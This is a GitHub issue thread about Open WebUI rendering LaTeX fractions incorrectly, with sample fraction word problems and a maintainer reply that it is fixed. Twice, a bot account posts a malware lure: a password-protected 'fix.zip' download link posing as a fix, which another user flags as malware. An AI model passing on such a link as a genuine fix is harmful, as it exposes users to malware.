### ISSUE TITLE
Fractions in Latex are not rendered correctly

### ISSUE THREAD

**Issue by snexus** [open-webui/open-webui#4906]
# Bug Report

## Installation Method

Docker (main tag)

## Environment

* Open WebUI Version - 0.3.15
* Operating System - OpenSuse TW
* Browser - Brave (1.69.153) and Firefox (129.0), both have the same behaviour.

**Confirmation:**

- [x ] I have read and followed all the instructions provided in the README.md.
- [ x] I am on the latest version of both Open WebUI and Ollama.
- [ ] I have included the browser console logs.
- [ ] I have included the Docker container logs.
- [ ] I have provided the exact steps to reproduce the bug in the "Steps to Reproduce" section below.

## Expected Behavior:

Render correctly Latex expressions, in particular fractions.

## Actual Behavior:

When entering prompts that result in Latex expressions containing fractions, it is not correctly rendered in the UI

## Description

**Bug Summary:**

When entering prompts that result in Latex expressions containing fractions, it is not correctly rendered in the UI

## Reproduction Details

**Steps to Reproduce:**

Prompt:
"I want you to generate 3 math word problems involving fractions for grade 5, containing 2 or 3 fractions with operations like addition or subtraction"

Answer: 
Sure! Here are three math word problems involving fractions suitable for grade 5: 
Problem 1: 

Samantha made a fruit salad using apples, bananas, and grapes. She used 52​ of a cup of apples, 31​ of a cup of bananas, and 41​ of a cup of grapes. How much fruit did she use in total?  

Please note that underlying Markdown contains the correct Latex expression (so it is not a model issue):

```md
Sure! Here are three math word problems involving fractions suitable for grade 5:

### Problem 1:
Samantha made a fruit salad using apples, bananas, and grapes. She used \( \frac{2}{5} \) of a cup of apples, \( \frac{1}{3} \) of a cup of bananas, and \( \frac{1}{4} \) of a cup of grapes. How much fruit did she use in total? 

### Problem 2:
During a school fundraiser, the students sold cookies. They sold \( \frac{3}{8} \) of a box of chocolate cookies and \( \frac{1}{4} \) of a box of vanilla cookies. How much of the boxes of cookies have the students sold altogether? 

### Problem 3:
Liam has \( \frac{5}{6} \) of a pizza left from Friday, and he ate \( \frac{1}{3} \) of what he had on Saturday. How much pizza does Liam have left after Saturday? 

Feel free to ask if you'd like additional problems or variations!
```

## Logs and Screenshots
![Screenshot_20240826_163701](https://github.com/user-attachments/assets/a4eb38b6-030e-4fde-b20c-4407962735f5)

**Browser Console Logs:**
[Include relevant browser console logs, if applicable]

**Docker Container Logs:**
[Include relevant Docker container logs, if applicable]

**Screenshots/Screen Recordings (if applicable):**
[Attach any relevant screenshots to help illustrate the issue]

## Additional Information

[Include any additional details that may help in understanding and reproducing the issue. This could include specific configurations, error messages, or anything else relevant to the bug.]

## Note

If the bug report is incomplete or does not follow the provided instructions, it may not be addressed. Please ensure that you have followed the steps outlined in the README.md and troubleshooting.md documents, and provide all necessary information for us to reproduce and address the issue. Thank you!

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by silentoplayz** [comment]
@snexus Ignore the comments above at all costs. These are bot accounts attempting to spread some form of unwanted malware.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tjbck** [comment]
Fixed on dev.
